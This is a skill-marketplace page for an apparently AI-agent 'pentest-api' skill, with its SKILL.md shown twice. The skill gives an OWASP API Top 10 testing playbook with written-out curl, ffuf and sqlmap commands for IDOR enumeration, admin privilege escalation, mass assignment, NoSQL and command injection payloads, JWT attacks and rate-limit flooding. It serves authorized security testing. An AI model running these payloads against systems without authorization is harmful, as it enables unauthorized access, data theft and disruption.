Run any Skill in Manus with one click

Get Started

pentest-api

API security testing — REST, GraphQL, authentication, authorization, rate limiting, business logic

Run Skill in Manus

Overview

API security testing — REST, GraphQL, authentication, authorization, rate limiting, business logic

Install command

npx skills add https://github.com/TheophilusChinomona/athena-pentest --skill pentest-api

Copy and paste this command into Claude Code to install the skill

Source

TheophilusChinomona/athena-pentest

Stars0

Forks0

UpdatedApril 30, 2026 at 03:54

SKILL.md

readonly

name	pentest_api
description	API security testing — REST, GraphQL, authentication, authorization, rate limiting, business logic
triggers	["api pentest","api test","rest api","graphql","idor","bola"]

API Security Testing Skill

Dedicated skill for testing REST and GraphQL API security (OWASP API Top 10).

Prerequisites

API base URL(s) from recon
Authentication tokens/credentials if available
API documentation (Swagger/OpenAPI) if available
Confirmation before active testing

Phase 1: API Discovery & Mapping

1.1 Find API Endpoints

# Check common doc locations
curl -s {target_url}/swagger.json | jq '.paths | keys[]' > /tmp/api-swagger-paths.txt
curl -s {target_url}/openapi.json | jq '.paths | keys[]' > /tmp/api-openapi-paths.txt

# Fuzz common API paths
ffuf -u {target_url}/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/swagger.txt \
  -mc 200 -o /tmp/api-docs-ffuf.json -of json

ffuf -u {target_url}/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/api/api-endpoints.txt \
  -mc 200,201,204,301,302,401,403,405 -o /tmp/api-endpoints.json -of json

1.2 GraphQL Schema Introspection

curl -s -X POST {target_url}/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"query IntrospectionQuery { __schema { queryType { name } mutationType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name } } } }"}' \
  | jq '.' > /tmp/graphql-schema.json

Phase 2: Authentication Testing

2.1 Auth Mechanism Discovery

# Test: no auth, invalid token, expired token
curl -s -o /dev/null -w "%{http_code}" {target_url}/api/users
curl -s -o /dev/null -w "%{http_code}" -H "Authorization: Bearer TOKEN" {target_url}/api/users

2.2 Token Attacks

JWT: alg:none, weak secret brute-force (john), RS256→HS256 key confusion
API key enumeration/prediction
OAuth: redirect URI manipulation, state parameter bypass

Phase 3: Authorization Testing

3.1 BOLA / IDOR

# Enumerate resource IDs with same token
for id in $(seq 1 100); do
  curl -s -H "Authorization: Bearer TOKEN" {target_url}/api/users/${id} | jq '.email // empty'
done

3.2 BFLA — Force admin privileges

curl -s -H "Authorization: Bearer USER_TOKEN" {target_url}/api/admin/users
curl -s -X DELETE -H "Authorization: Bearer USER_TOKEN" {target_url}/api/users/2
curl -s -X PATCH -H "Authorization: Bearer USER_TOKEN" {target_url}/api/users/1 \
  -d '{"role":"admin"}'

3.3 Mass Assignment

curl -X POST {target_url}/api/users \
  -H "Authorization: Bearer TOKEN" -H "Content-Type: application/json" \
  -d '{"username":"test","email":"test@test.com","role":"admin","is_admin":true}'

Phase 4: Input Validation

4.1 Injection

# SQLi in API params
sqlmap -u "{target_url}/api/users?id=1" --batch --level=3 --headers="Authorization: Bearer TOKEN"

# NoSQL injection
curl -X POST {target_url}/api/login -H "Content-Type: application/json" \
  -d '{"username":{"$gt":""},"password":{"$gt":""}}'

# Command injection
curl -X POST {target_url}/api/ping -H "Content-Type: application/json" \
  -d '{"host":"127.0.0.1; sleep 5"}'

# XXE in XML/SOAP APIs

4.2 Type Confusion

curl -X POST {target_url}/api/search -H "Content-Type: application/json" \
  -d '{"query":{"$regex":".*"}}'

Phase 5: Rate Limiting & DoS

5.1 Rate Limit Testing

for i in $(seq 1 200); do
  STATUS=$(curl -s -o /dev/null -w "%{http_code}" {target_url}/api/users)
  [[ "$STATUS" == "429" ]] && echo "Rate limited at request $i" && break
done

5.2 GraphQL DoS

Batch queries, deeply nested queries
Check query depth/complexity limits

Phase 6: Data Exposure

Check for excessive data in responses; sensitive fields exposed.

Output Files

/tmp/api-swagger-paths.txt
/tmp/api-endpoints.json
/tmp/graphql-schema.json
/tmp/api-findings.md

Safety

Confirm before testing authenticated/privileged endpoints
Rate-limit your own tests (don't DoS production)
Do not exfiltrate real user data — prove access, document, stop
Log all API calls for evidence

API Security Testing Skill

Dedicated skill for testing REST and GraphQL API security (OWASP API Top 10).

Prerequisites

API base URL(s) from recon
Authentication tokens/credentials if available
API documentation (Swagger/OpenAPI) if available
Confirmation before active testing

Phase 1: API Discovery & Mapping

1.1 Find API Endpoints

# Check common doc locations
curl -s {target_url}/swagger.json | jq '.paths | keys[]' > /tmp/api-swagger-paths.txt
curl -s {target_url}/openapi.json | jq '.paths | keys[]' > /tmp/api-openapi-paths.txt

# Fuzz common API paths
ffuf -u {target_url}/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/swagger.txt \
  -mc 200 -o /tmp/api-docs-ffuf.json -of json

ffuf -u {target_url}/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/api/api-endpoints.txt \
  -mc 200,201,204,301,302,401,403,405 -o /tmp/api-endpoints.json -of json

1.2 GraphQL Schema Introspection

curl -s -X POST {target_url}/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"query IntrospectionQuery { __schema { queryType { name } mutationType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name } } } }"}' \
  | jq '.' > /tmp/graphql-schema.json

Phase 2: Authentication Testing

2.1 Auth Mechanism Discovery

# Test: no auth, invalid token, expired token
curl -s -o /dev/null -w "%{http_code}" {target_url}/api/users
curl -s -o /dev/null -w "%{http_code}" -H "Authorization: Bearer TOKEN" {target_url}/api/users

2.2 Token Attacks

JWT: alg:none, weak secret brute-force (john), RS256→HS256 key confusion
API key enumeration/prediction
OAuth: redirect URI manipulation, state parameter bypass

Phase 3: Authorization Testing

3.1 BOLA / IDOR

# Enumerate resource IDs with same token
for id in $(seq 1 100); do
  curl -s -H "Authorization: Bearer TOKEN" {target_url}/api/users/${id} | jq '.email // empty'
done

3.2 BFLA — Force admin privileges

curl -s -H "Authorization: Bearer USER_TOKEN" {target_url}/api/admin/users
curl -s -X DELETE -H "Authorization: Bearer USER_TOKEN" {target_url}/api/users/2
curl -s -X PATCH -H "Authorization: Bearer USER_TOKEN" {target_url}/api/users/1 \
  -d '{"role":"admin"}'

3.3 Mass Assignment

curl -X POST {target_url}/api/users \
  -H "Authorization: Bearer TOKEN" -H "Content-Type: application/json" \
  -d '{"username":"test","email":"test@test.com","role":"admin","is_admin":true}'

Phase 4: Input Validation

4.1 Injection

# SQLi in API params
sqlmap -u "{target_url}/api/users?id=1" --batch --level=3 --headers="Authorization: Bearer TOKEN"

# NoSQL injection
curl -X POST {target_url}/api/login -H "Content-Type: application/json" \
  -d '{"username":{"$gt":""},"password":{"$gt":""}}'

# Command injection
curl -X POST {target_url}/api/ping -H "Content-Type: application/json" \
  -d '{"host":"127.0.0.1; sleep 5"}'

# XXE in XML/SOAP APIs

4.2 Type Confusion

curl -X POST {target_url}/api/search -H "Content-Type: application/json" \
  -d '{"query":{"$regex":".*"}}'

Phase 5: Rate Limiting & DoS

5.1 Rate Limit Testing

for i in $(seq 1 200); do
  STATUS=$(curl -s -o /dev/null -w "%{http_code}" {target_url}/api/users)
  [[ "$STATUS" == "429" ]] && echo "Rate limited at request $i" && break
done

5.2 GraphQL DoS

Batch queries, deeply nested queries
Check query depth/complexity limits

Phase 6: Data Exposure

Check for excessive data in responses; sensitive fields exposed.

Output Files

/tmp/api-swagger-paths.txt
/tmp/api-endpoints.json
/tmp/graphql-schema.json
/tmp/api-findings.md

Safety

Confirm before testing authenticated/privileged endpoints
Rate-limit your own tests (don't DoS production)
Do not exfiltrate real user data — prove access, document, stop
Log all API calls for evidence

pentest-api

API Security Testing Skill

Prerequisites

Phase 1: API Discovery & Mapping

1.1 Find API Endpoints

1.2 GraphQL Schema Introspection

Phase 2: Authentication Testing

2.1 Auth Mechanism Discovery

2.2 Token Attacks

Phase 3: Authorization Testing

3.1 BOLA / IDOR

3.2 BFLA — Force admin privileges

3.3 Mass Assignment

Phase 4: Input Validation

4.1 Injection

4.2 Type Confusion

Phase 5: Rate Limiting & DoS

5.1 Rate Limit Testing

5.2 GraphQL DoS

Phase 6: Data Exposure

Output Files

Safety

More from this repository

More from this repository

API Security Testing Skill

Prerequisites

Phase 1: API Discovery & Mapping

1.1 Find API Endpoints

1.2 GraphQL Schema Introspection

Phase 2: Authentication Testing

2.1 Auth Mechanism Discovery

2.2 Token Attacks

Phase 3: Authorization Testing

3.1 BOLA / IDOR

3.2 BFLA — Force admin privileges

3.3 Mass Assignment

Phase 4: Input Validation

4.1 Injection

4.2 Type Confusion

Phase 5: Rate Limiting & DoS

5.1 Rate Limit Testing

5.2 GraphQL DoS

Phase 6: Data Exposure

Output Files

Safety